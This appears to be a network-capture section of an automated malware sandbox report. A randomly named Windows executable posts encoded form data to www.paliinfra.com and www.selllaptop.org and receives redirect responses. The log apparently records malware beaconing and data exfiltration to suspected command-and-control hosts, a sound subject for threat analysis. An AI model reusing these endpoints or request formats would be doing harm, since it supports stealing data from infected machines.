                                                            43192.168.11.204981784.32.84.192807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:39:22.826396942 CEST7734OUTPOST /12kg/ HTTP/1.1
                                                            Host: www.paliinfra.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.paliinfra.com
                                                            Referer: http://www.paliinfra.com/12kg/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 49 50 62 46 2f 47 43 73 31 35 58 68 2f 51 33 6e 76 66 4c 2f 61 78 57 30 66 42 6c 34 65 6e 35 2b 6f 74 71 6b 6e 61 38 33 48 45 62 70 7a 78 74 6b 45 2b 44 68 64 59 7a 65 34 77 34 6b 77 66 39 55 67 47 78 73 58 30 50 6b 65 5a 42 67 48 4e 4a 76 4a 30 42 42 76 61 69 61 73 47 6c 69 66 37 73 32 42 42 67 4a 58 7a 4e 30 48 4d 45 73 4c 68 4c 54 62 6c 66 6e 37 4a 53 39 32 46 32 6d 36 45 45 58 6e 66 6f 41 4e 4a 44 6a 30 6a 68 55 4d 57 74 4e 41 46 61 70 72 69 65 74 47 51 66 5a 6d 57 32 2b 52 4f 46 6e 4e 34 4a 59 42 64 39 54 6e 6c 65 66 32 49 31 30 57 6a 59 75 63 58 58 55 45 4d 63 48 62 6a 35 53 78 49 56 35 71 56 68 5a 6e 6f 58 75 4f 64 68 2f 41 64 63 48 50 52 54 71 49 35 61 70 4b 5a 6b 67 67 30 39 53 56 76 43 2b 30 41 75 31 54 4e 4a 69 6b 74 63 4a 75 4e 68 73 75 57 62 4c 54 50 41 78 66 4d 55 47 52 38 52 54 41 67 76 76 4b 6f 48 56 35 41 50 46 39 51 64 61 63 36 39 6e 71 6e 76 57 6e 46 54 4b 47 6e 71 77 4a 48 76 39 32 77 4b 47 42 63 55 48 58 57 6c 41 77 66 5a 7a 4c 6d 4f 53 32 31 72 76 43 32 75 52 6f 6b 2b [TRUNCATED]
                                                            Data Ascii: vX=IPbF/GCs15Xh/Q3nvfL/axW0fBl4en5+otqkna83HEbpzxtkE+DhdYze4w4kwf9UgGxsX0PkeZBgHNJvJ0BBvaiasGlif7s2BBgJXzN0HMEsLhLTblfn7JS92F2m6EEXnfoANJDj0jhUMWtNAFaprietGQfZmW2+ROFnN4JYBd9Tnlef2I10WjYucXXUEMcHbj5SxIV5qVhZnoXuOdh/AdcHPRTqI5apKZkgg09SVvC+0Au1TNJiktcJuNhsuWbLTPAxfMUGR8RTAgvvKoHV5APF9Qdac69nqnvWnFTKGnqwJHv92wKGBcUHXWlAwfZzLmOS21rvC2uRok+hiKcWvnGSxsr06pfwah0m1UzAR7OYHPDsfT43oYgo5PNCt1UJpVzqyigXnfm4maoh6SSpa02GdC5bZu18keIdCgksCrR4d5pGeKPAqvqVDlgIyW+d5b1bv+7XrPSC8CQ1Ym8MuH3NgXCDnpzRaSBMEBD6Aa5tU0LZRUibrZ0Ey9S/dMUl/K8eLWjYx0MUMBpAYCzj+couLYgOYCpaynUFgpBlTSi5Uv9b6wetChT9HuULTIwvLUYdUMBR37aV7cKXQa4EgMa6R1EIeyjRe8zbASGGSCRmtW/dvlurIdUj4dqRaNMfrepvq7ysAbhpZTshQsGueKVwfY7bFuxT7nydJykcFAlywciOuLLNEc5rEn5tIlYfRtbLLp0uZFidENKNZxYI1/tjY1M3g+7MX73VYeDwLB4stavOtIEsLMBqKZeRY0Sgo5FiWQbt2LpZGSGpLNnVKFz88xdjMNSIW77YqDE9px77zVlNFDkPS9bbsSbtyGFiBVsLtLLFZvmAuknFUuyknG58SPwd4yNjT5tjQPetEFmy4eg2Y5wtihyeMLtQb2Zk6G1/A6SkPVyFWhbPphuvlo8+2xQu/ldQITCDX3YSNj4jC67kxAe06RntcS1JyvinXFNK/RdV9Pi+POq/TPm2kRoChRlvw0gL57uVQ1z8mpBOUyegf [TRUNCATED]
                                                            Jul 3, 2024 17:39:22.826476097 CEST5156OUTData Raw: 71 37 4c 4e 67 6b 75 62 32 6c 2f 6c 56 69 32 67 42 68 48 78 54 51 47 43 45 34 41 2f 46 42 38 76 6f 73 4c 7a 4b 59 42 52 4d 59 72 69 7a 4f 69 76 46 58 38 33 41 78 77 52 2b 62 6a 2f 33 54 57 41 6e 30 73 66 4c 78 68 69 52 75 51 4a 55 47 36 55 4f 6f
                                                            Data Ascii: q7LNgkub2l/lVi2gBhHxTQGCE4A/FB8vosLzKYBRMYrizOivFX83AxwR+bj/3TWAn0sfLxhiRuQJUG6UOonkgh9Sg/NJaW4Nv+LktGf5j0384rSIYPVx+8UoLpoZUHf5Y8NO5tG8ZGsocUktlbCcbizHrb8Yw+PY44DJbDrGGbZaEUothFNKOzp302I6z48UZAQlS0bmXkOMswsq2UFhQykNwLT0v7MQXAGW1cwAe2ZX32UrwhG
                                                            Jul 3, 2024 17:39:23.073486090 CEST2578OUTData Raw: 4d 43 56 65 70 49 4e 66 42 6a 6e 4a 52 58 57 53 6f 59 69 6e 37 63 48 59 74 43 58 63 48 4d 72 4d 73 32 36 6d 38 4f 51 57 43 39 54 44 64 6f 4e 6d 53 62 48 34 35 46 53 48 67 79 4a 41 4a 52 37 5a 63 72 6a 36 56 57 53 79 63 78 4d 6b 6c 53 6b 2b 32 71
                                                            Data Ascii: MCVepINfBjnJRXWSoYin7cHYtCXcHMrMs26m8OQWC9TDdoNmSbH45FSHgyJAJR7Zcrj6VWSycxMklSk+2q8M0HVDi8P81034C0WmIftBz9TumU+UaJGOIyywB/wkRAbOcbVEReO2W6D84pvIeHT7mTfYB3HjrQ7wUUWB16JKe8627NE74rusCr6QqrVDozF2KhmfWCQpAA23mUQw7I0TF9tvkac3ytcK2y8V4OKxMI3oljqFwWO
                                                            Jul 3, 2024 17:39:23.073553085 CEST7734OUTData Raw: 69 59 46 5a 37 4e 64 55 72 7a 6e 5a 6c 64 58 7a 45 4b 6a 6b 54 56 4c 6f 53 36 33 50 42 7a 2b 69 73 45 2f 33 67 74 31 56 69 34 48 46 4b 39 71 7a 75 50 54 43 48 6b 48 61 38 72 44 2b 55 38 5a 67 69 4a 43 39 52 54 70 73 77 73 69 4b 47 72 43 69 44 4e
                                                            Data Ascii: iYFZ7NdUrznZldXzEKjkTVLoS63PBz+isE/3gt1Vi4HFK9qzuPTCHkHa8rD+U8ZgiJC9RTpswsiKGrCiDNOx/f+Gyj6XsK5j/9NoO++hxtT53R3KpiEbMmgQy9ZmcmOy+d7QlSQoBOobrwXJ+HsbBcpp84PXFHltckPTWwgevBLsT0jAU5rOsPA2pN7wkHvSQVrKDzdT/PTo4mnvXGJiGnnbIiqZmuHXEMGxfAx1CRq7zxVoOc8
                                                            Jul 3, 2024 17:39:23.073599100 CEST2578OUTData Raw: 56 51 70 51 4f 67 2f 52 6f 43 54 36 36 74 71 7a 5a 2b 32 43 30 71 7a 47 79 36 4b 55 46 65 36 33 31 31 48 47 31 34 32 42 35 77 2f 7a 4a 6c 72 66 4f 66 61 54 69 44 57 4a 4b 53 67 55 70 62 30 59 72 66 37 79 6d 51 4e 6a 5a 6f 2b 52 48 42 74 52 2b 67
                                                            Data Ascii: VQpQOg/RoCT66tqzZ+2C0qzGy6KUFe6311HG142B5w/zJlrfOfaTiDWJKSgUpb0Yrf7ymQNjZo+RHBtR+ghLZqzgz3G2oi3YRpAAxXnycR/a0yHJZmKzVsupOnpr/NW1inP/xzYorUTYw0A6put0WWHL1GdqiwqtWnMZlPl281IN3YfNpbzdb2Ft8j/HlIByi0KxMZkL+10rQmgJQ1/VrvqsYEQLtH4ernNTSv6D9iwMyWGET/9
                                                            Jul 3, 2024 17:39:23.073941946 CEST12890OUTData Raw: 53 51 4a 73 69 79 4b 77 52 31 59 73 42 70 50 48 76 41 41 47 51 45 71 57 72 4f 6c 62 6e 38 63 45 4f 7a 43 57 51 4f 78 2f 4b 6d 2f 59 72 5a 64 72 49 6a 67 31 71 5a 48 48 31 76 36 36 59 50 76 56 36 7a 77 4e 43 43 61 49 43 57 34 6c 77 53 32 6b 71 30
                                                            Data Ascii: SQJsiyKwR1YsBpPHvAAGQEqWrOlbn8cEOzCWQOx/Km/YrZdrIjg1qZHH1v66YPvV6zwNCCaICW4lwS2kq0/aAbbsjZEK4Cl9o2NwW0t0Tqa4/66q+cRTEeh13GZNhvlbr//VSU5fyb5C8jsXPcBYUIEM3EnXt33ATU0zleT0CEb4q46nFt8WqP5GAXstHYy551c2IsNGKjCQ5Ur4QmzK7kp9muYF5jZ8JmSZAztmS5cvB3z4JEU
                                                            Jul 3, 2024 17:39:23.324693918 CEST3867OUTData Raw: 75 36 34 70 38 70 68 30 37 76 76 5a 54 79 68 65 5a 71 6a 64 57 73 37 31 68 67 6e 64 4b 46 54 46 6f 79 64 74 2b 36 73 6c 42 35 73 30 51 73 54 37 69 66 6f 4d 65 4f 43 6d 4b 49 45 72 64 35 44 42 38 67 55 6f 49 48 35 2f 33 6c 44 50 70 73 38 46 4b 43
                                                            Data Ascii: u64p8ph07vvZTyheZqjdWs71hgndKFTFoydt+6slB5s0QsT7ifoMeOCmKIErd5DB8gUoIH5/3lDPps8FKCdBMopMePBa8Z86x/DcZ8diFvBtIOir65D9ZscHwDwM1LFdfewMvWXXlDMwXiORXfrWA0GSj9mG2FDzedxBaOh94Nhhn8LqhT99aWOkfYGWFdr/X7qyiSof3kZTYrwYgyUu8lolYxCM42ybO9eq9gb+uDKVvZHMz+x
                                                            Jul 3, 2024 17:39:23.324744940 CEST5156OUTData Raw: 4f 41 51 41 55 58 6b 4a 64 63 34 50 6a 4c 2b 6a 31 6f 31 53 65 65 62 59 33 77 47 50 32 52 51 2b 4f 56 43 34 67 65 76 70 48 71 51 68 66 59 67 43 7a 4b 66 77 72 6d 75 79 50 47 41 6f 56 7a 2b 6f 33 55 39 70 74 63 6c 6a 6e 2b 75 4b 7a 54 61 6f 2f 42
                                                            Data Ascii: OAQAUXkJdc4PjL+j1o1SeebY3wGP2RQ+OVC4gevpHqQhfYgCzKfwrmuyPGAoVz+o3U9ptcljn+uKzTao/B61TWeKFNj9vvQCiRgw0GDGsrQP1LCackQN4McbzCMTDEXVdJVWS7rHLYxEUCJtnGSAXwfAAcegyJpRYgwts4zydGERNotfTbd88Cm/AUdX6nZqG9bpHkp+uwQhH0n3v/vi/Dt0fNMaEbRxesyB4UPJEEDW+liB4xd
                                                            Jul 3, 2024 17:39:23.324791908 CEST5829OUTData Raw: 48 61 75 75 58 64 35 33 7a 4c 43 37 36 38 6d 68 77 66 4b 34 37 4b 51 77 46 72 53 47 4b 39 36 64 52 46 64 38 67 46 79 6b 45 2f 7a 46 35 72 4c 50 4b 33 61 77 6f 6d 31 65 44 57 67 73 6b 64 55 43 41 4d 71 79 73 6f 4f 50 30 4e 33 75 48 6c 4a 50 36 54
                                                            Data Ascii: HauuXd53zLC768mhwfK47KQwFrSGK96dRFd8gFykE/zF5rLPK3awom1eDWgskdUCAMqysoOP0N3uHlJP6TkBtNyZHSvydQlTL4Aq2eXGDyk+mC8lkEQvDnfkwp/JmB1UqBW2/CXtWviDIeI+9+h9+9Ge95AeaBRUTPJzj4gZ43Q+wXIddG+Ae9vHM0RgETgGc/U2B+BkYTkxXwF6AuutkrEAQonzdNnN5/m5G4w6w2Y5BaVxIAZ
                                                            Jul 3, 2024 17:39:24.262131929 CEST1211INHTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Wed, 03 Jul 2024 15:39:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.paliinfra.com/12kg/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: ef12695f63427e8a33704ec304a9f7ef-asc-edge5
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.666
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            44192.168.11.204981884.32.84.192807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:39:25.651051998 CEST521OUTGET /12kg/?vX=FNzl8wnE++HPhG206OaKKCmPORssckNSyI+M4a86U0qBkTFFPriGBeWQyCEz+v1Kx2tJcxLpZ/phLMA1BmxsvaSisGFPcKMREi9fCQxgCdocMTbgTC3h6NU=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.paliinfra.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:39:26.555114985 CEST1289INHTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Wed, 03 Jul 2024 15:39:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.paliinfra.com/12kg/?vX=FNzl8wnE++HPhG206OaKKCmPORssckNSyI+M4a86U0qBkTFFPriGBeWQyCEz+v1Kx2tJcxLpZ/phLMA1BmxsvaSisGFPcKMREi9fCQxgCdocMTbgTC3h6NU=&_B7=LxyxWrj8kri0gh
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: e414735422a99c70a6ef87d2cb41b235-asc-edge3
                                                            x-hcdn-cache-status: MISS
                                                            x-hcdn-upstream-rt: 0.644
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The docume
                                                            Jul 3, 2024 17:39:26.555211067 CEST62INData Raw: 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: nt has been permanently moved.</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            45192.168.11.20498203.33.130.19080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:04.604430914 CEST788OUTPOST /tq5r/ HTTP/1.1
                                                            Host: www.selllaptop.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.selllaptop.org
                                                            Referer: http://www.selllaptop.org/tq5r/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 37 59 4a 46 4e 36 6a 34 61 64 62 4c 59 2b 41 44 48 66 62 66 66 37 67 51 44 53 73 56 6b 50 65 58 75 30 55 55 6a 52 54 47 35 36 77 57 68 53 72 6f 73 36 67 2f 35 35 39 41 42 41 44 49 49 78 59 46 30 76 44 2f 77 59 36 76 6a 37 74 71 2b 67 52 70 6f 65 31 2b 6c 61 4d 6a 30 49 4c 6d 6b 73 6c 58 44 2f 62 2f 79 4c 67 74 57 44 45 41 6f 73 50 66 71 7a 59 5a 58 4d 47 38 37 4b 4e 44 77 4f 78 32 56 2f 69 6b 38 33 4a 71 56 61 34 4b 62 42 33 72 54 51 66 2f 64 59 4f 2f 56 49 44 4b 66 62 6c 52 32 74 6d 35 45 48 56 69 74 78 6f 69 6b 76 54 57 69 37 6e 75 67 53 71 78 73 32 31 6e 72 30 57 2b 68 51 3d 3d
                                                            Data Ascii: vX=7YJFN6j4adbLY+ADHfbff7gQDSsVkPeXu0UUjRTG56wWhSros6g/559ABADIIxYF0vD/wY6vj7tq+gRpoe1+laMj0ILmkslXD/b/yLgtWDEAosPfqzYZXMG87KNDwOx2V/ik83JqVa4KbB3rTQf/dYO/VIDKfblR2tm5EHVitxoikvTWi7nugSqxs21nr0W+hQ==


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            46192.168.11.20498213.33.130.19080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:07.282335043 CEST1128OUTPOST /tq5r/ HTTP/1.1
                                                            Host: www.selllaptop.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.selllaptop.org
                                                            Referer: http://www.selllaptop.org/tq5r/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 37 59 4a 46 4e 36 6a 34 61 64 62 4c 65 65 77 44 45 35 54 66 4c 72 67 54 66 43 73 56 72 76 65 4d 75 30 59 55 6a 54 2f 57 36 4a 59 57 68 79 62 6f 74 37 67 2f 33 5a 39 41 4f 67 44 48 4d 78 59 4f 30 76 65 63 77 64 43 76 6a 37 35 71 2f 53 4a 70 75 75 31 78 39 4b 4d 67 33 49 4c 72 31 38 6c 4b 44 2f 57 51 79 4b 6b 74 57 53 6f 41 36 2b 58 66 39 53 59 61 54 73 47 2b 39 4b 4e 4d 6d 2b 77 33 56 2f 75 73 38 31 4a 36 41 35 6b 4b 62 68 58 72 53 51 66 38 56 6f 4f 38 4a 34 43 44 54 2b 38 48 7a 35 75 6b 41 31 42 47 6c 69 6b 41 34 64 72 79 6d 4e 53 57 69 54 4f 6f 76 46 30 4a 71 56 6a 51 36 33 6f 62 66 4a 4a 6d 78 68 31 44 55 48 59 72 71 68 59 66 7a 73 76 75 6b 50 63 73 4e 6b 50 70 6e 61 57 34 71 57 41 36 4a 71 66 77 4d 4d 79 30 67 72 2f 4f 6d 4b 38 53 37 42 77 51 75 59 53 45 4d 47 6e 47 4d 6f 4c 75 6b 4b 4f 46 71 36 4c 74 4b 58 61 31 78 47 4c 57 6f 4d 31 44 45 6d 75 46 6b 79 36 38 6e 35 55 4f 34 4a 4d 35 42 37 59 6a 50 51 64 5a 50 64 72 66 74 35 76 4b 31 49 59 77 5a 4c 2b 34 46 63 68 77 74 43 2f 6f 30 47 6d [TRUNCATED]
                                                            Data Ascii: vX=7YJFN6j4adbLeewDE5TfLrgTfCsVrveMu0YUjT/W6JYWhybot7g/3Z9AOgDHMxYO0vecwdCvj75q/SJpuu1x9KMg3ILr18lKD/WQyKktWSoA6+Xf9SYaTsG+9KNMm+w3V/us81J6A5kKbhXrSQf8VoO8J4CDT+8Hz5ukA1BGlikA4drymNSWiTOovF0JqVjQ63obfJJmxh1DUHYrqhYfzsvukPcsNkPpnaW4qWA6JqfwMMy0gr/OmK8S7BwQuYSEMGnGMoLukKOFq6LtKXa1xGLWoM1DEmuFky68n5UO4JM5B7YjPQdZPdrft5vK1IYwZL+4FchwtC/o0GmhCSZ1f/LzC4K69OTIrgMQHQ8Ii9WQvDnvCyIlsKimvz6wsWerHL6IzM+Nmnzjk/oniLD3bDtG/3HUTwjRhJZf7MD4Ur9lIMsxzoyKHxg0YmX+y4Dt1MKHscnNKjpw+cqbu87OywwOkEQAcTQZfGpToYIm/qGjbtedQDRpw6/UmrEzF/bmsRY6m/mfJNN4URbAf3HiRNE=


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            47192.168.11.20498223.33.130.19080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:09.955025911 CEST2578OUTPOST /tq5r/ HTTP/1.1
                                                            Host: www.selllaptop.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.selllaptop.org
                                                            Referer: http://www.selllaptop.org/tq5r/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 37 59 4a 46 4e 36 6a 34 61 64 62 4c 65 65 77 44 45 35 54 66 4c 72 67 54 66 43 73 56 72 76 65 4d 75 30 59 55 6a 54 2f 57 36 4a 41 57 6d 44 37 6f 73 59 49 2f 30 5a 39 41 48 41 43 41 4d 78 59 54 30 76 57 41 77 64 47 67 6a 35 42 71 2b 42 68 70 75 63 64 78 34 4b 4d 6c 34 6f 4c 70 6b 73 6b 64 44 2f 61 4d 79 4f 4d 39 57 44 63 41 6f 73 66 66 71 56 73 5a 56 4d 47 38 39 4b 4d 4e 30 4f 78 4b 56 2f 36 47 38 31 56 36 41 37 51 4b 59 79 76 72 52 48 4c 38 59 59 4f 6a 43 59 43 41 5a 65 38 32 7a 35 53 57 41 31 41 78 6c 6a 51 41 34 64 4c 79 6e 4b 75 58 6e 44 4f 6f 6a 6c 30 47 67 30 66 55 36 33 31 45 66 4a 39 6d 78 6d 68 44 53 6e 59 72 76 45 34 65 37 73 76 6f 75 76 64 73 48 46 7a 68 6e 65 2f 4a 71 53 51 36 4b 62 37 77 4b 2f 61 30 7a 4f 66 4f 6c 71 38 51 2f 42 78 4b 6b 34 53 49 4d 47 32 6e 4d 70 72 55 6b 4e 4f 46 73 62 72 74 61 6d 61 71 6d 57 4c 51 74 4d 30 5a 41 6d 69 7a 6b 79 71 77 6e 35 56 56 34 4e 55 35 42 4c 6f 6a 4d 55 4a 57 4f 74 72 63 6c 5a 76 66 37 59 56 2f 5a 4e 61 47 46 59 6c 65 74 44 33 6f 31 6d 6d [TRUNCATED]
                                                            Data Ascii: vX=7YJFN6j4adbLeewDE5TfLrgTfCsVrveMu0YUjT/W6JAWmD7osYI/0Z9AHACAMxYT0vWAwdGgj5Bq+Bhpucdx4KMl4oLpkskdD/aMyOM9WDcAosffqVsZVMG89KMN0OxKV/6G81V6A7QKYyvrRHL8YYOjCYCAZe82z5SWA1AxljQA4dLynKuXnDOojl0Gg0fU631EfJ9mxmhDSnYrvE4e7svouvdsHFzhne/JqSQ6Kb7wK/a0zOfOlq8Q/BxKk4SIMG2nMprUkNOFsbrtamaqmWLQtM0ZAmizkyqwn5VV4NU5BLojMUJWOtrclZvf7YV/ZNaGFYletD3o1mmhShxyG/LOPYKsyuTlrhxxHUt3iM6Qu3HvOCIqoqjh6D629GerHL3szM6NmX7jlIknyM33dDt6/3H/TwvihJRx7NzGUoRlPd8x+KaNVxg1cmWo8Yf61MmxscW6KzFw/c6blc6YwQwJnEQRLjtYfG1loYUM/pGjY4CAB3NdzoD3vpFKE93wiwYFpfnqBI11VSbwLkDqSNASjaVKeFqme5Bl9VSkMn62MdXsG0KuWLtEV/NRVMrIhJ/cf6hIoXzHfKQuBqxyzLyz0qFo9IOnUnjXDn/x99ongKDACzE4KuveKxIJLfsGjXaeapDTIUzEcYZD+K9nqMLQnbiZ4+w7Jwe1/xE9+gG6SGutNLSj8QUCZodLPnVgPs6ZlAbgaGk88EW0HnLERuRLCfQDSPnalk/abzaaNCAQ4DWZxu9DeUnQ/SQN2FizLRavi8SDDPL11Evvap2Ur3iDdkjLAmlbgLRzkQHuGdQxsaaOmBhBjrNxSlH+clcQZpwLIpl7lnn+/y8g+cV8gz0RPcmqrk2zAAbHrCXMkB4iL9ko9C61a8XNonXZirGZcklU67JvQU8EOoGHQWAPacSseTQwDyFaVAusGphyvrcsRvMaK58lXMlEhQ8InN3s2R0zZvOpkzmGlbBIqcD/hGZoylP7qXRqmdNzSW7zxx2WytdHz [TRUNCATED]
